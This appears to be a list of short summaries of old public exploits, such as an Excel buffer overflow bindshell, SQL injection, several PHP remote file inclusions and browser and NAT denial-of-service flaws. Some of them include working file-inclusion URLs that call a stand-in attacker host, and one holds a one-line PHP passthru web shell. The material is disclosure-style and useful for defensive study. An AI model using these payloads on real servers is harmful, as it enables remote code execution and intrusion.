This exploit is a universal proof-of-concept (PoC) for a buffer overflow vulnerability in Microsoft Excel. It works with any of the following operating systems and Office combinations: Windows 2000 SP4/XP SP1/XP SP2 and Office 2000/XP/2003. It creates a bindshell on port 49152.
This exploit is a DLL which gets injected into the server exe. It uses Microsoft Detours library to compile the exploit. It is a remote stack overflow exploit which uses a string which is heavily filtered before the overflow occurs. It is used to cause damage to the server exe.
This exploit is used to gain access to the user's password hash by exploiting a SQL injection vulnerability in the BXCP web application. The exploit takes the server, directory and user ID as arguments and then sends an HTTP request to the server with the malicious SQL query. The response contains the user's password hash which can then be used to gain access to the user's account.
smartsite cms v1.0 is vulnerable to multiple remote file include vulnerability. The vulnerable code is present in comment.php, /admin/test.php, /admin/index.php and /admin/include/inc_adminfoot.php. The $root parameter is vulnerable to file include. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter.
This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address. This code currently overwrites a saved return addy with the stack location of our seteuid() / execve() shellcode.
This exploit is a Denial of Service (DoS) vulnerability in Opera 9. It was discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id). The exploit uses an iframe with a malicious JavaScript code to cause the browser to crash. The malicious code is triggered when the browser attempts to access the iframe's styleSheets property.
A Remote File Inclusion (RFI) vulnerability exists in randshop version 1.1.1 and earlier. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which can allow the attacker to execute arbitrary code on the server. The exploit code is http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
The following URL will cause the server to include external files http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls -al&_PX_config[manager_path]=http://attacker/cmd.gif? cmd.gif <? passthru($_GET['cmd']); ?>
Stud.IP is a learning and an information management system for universities, educational facilities and enterprises. Stud.IP is vulnerable to Remote File Inclusion vulnerability which allows an attacker to execute arbitrary PHP code by including files from local or external resources.
A buffer overflow vulnerability exists in Windows 2000 built-in NAT server when routing packets with options 'Loose Source and Record Route' defined by RFC 791 through the server. This can cause a Denial of Service (DoS) condition, system hangs, or instable work. Code execution is potentially possible. Tested configuration: Windows 2000 English Standard/Advanced Service Pack 4 + Update Rollup 1 for Service Pack 4 with NAT server enabled. Windows 2003 is not affected.
Services By CQR